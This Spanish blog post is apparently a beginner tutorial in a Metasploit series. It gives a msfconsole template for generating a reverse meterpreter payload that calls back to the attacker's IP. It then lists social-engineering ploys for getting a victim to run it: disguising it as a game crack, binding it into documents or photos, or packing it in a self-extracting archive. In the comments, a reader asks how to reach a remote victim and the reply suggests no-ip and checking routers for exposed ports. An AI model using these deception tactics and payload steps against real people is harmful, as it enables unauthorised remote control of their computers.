sábado, 23 de noviembre de 2013

Kali Linux: de 0 a metasploit 3, Crear un payload

Serie: De 0 a Metasploit
Conseguir una sesion de meterpreter
Crear un payload
Comandos basicos meterpreter


El ataque de hoy esta orientado a crear un payload que después podemos meter en un fichero y enviarlo a nuestra victima, de esta forma evitaremos muchos pasos y simplemente con un poco de ingenieria social se llevaria satisfactoriamente el ataque.

Vamos a la consola de metasploit. msfconsole y creamos nuestro payload manualmente:

#payload <payload> LHOST=<nuestraip> LPORT=4444 x >/<ruta donde queramos guardar el archivo>

x: Obtiene una shellcode en .exe, esta x podria sustituirse por C(C), R(Ruby),J(Javascript),P(Perl),R(lenguaje maquina).


para ver la lista de payloads disponibles escribir: >payload -l  

Yo usare el mismo payload que habiamos usado en el capitulo 2.


Y lo buscaremos en la carpeta donde le digimos.

Ahora tenemos que tirar de ingenieria social (Es la habilidad con la que podemos enagañar a un usuario para transformarla en victima), en nuestro caso tendra que hacker un doble click para abrir el archivo.

1º Una podria ser diciendo que es un crack para un juego
2º Bindearlo(Adjuntarlo) en un pdf, word, fotografia
3º Poniendolo en un winrar y crear un autoejecutable.
4º Poniendo un nombre que lo haga delicioso.
...


Ahora el cliente ya lo ha ejecutado. Pero
Tendremos que tener cuidado con los antivirus porque estos detectan esa actitud. Asi que desactivaremos el antivirus para esta practica.

Si no tenemos un listener, lo creamos:

Y cuando el cliente intente abrir el archivo nos lanzara un shell de meterpreter. Y ya tenemos el control de la maquina.


Saludos guerreros!!

2 comentarios:

  1. si la persona está en su casa, y yo en la mía, que ip debo poner? debo tener una ip publica? o al ser reversa la conexi+on él me encuentra

    ResponderEliminar
  2. Metasploit en el modulo free NO esta pensado para ataques en la misma red. Pero creo que podrías usar algún servicio como no-ip para poderlo hacerlo, tambien debes tener en cuenta que cuando atacas a otro ordenador fuera de la red, entrarias por su router (con la ip publica) y despues necesitas saber si hay puertos vulnerables o redirigidos al equipo victima. Te dejo un video con armitage que ataca a un server remoto: https://www.youtube.com/watch?v=57c_aCjUPWM . Saludos!!

    ResponderEliminar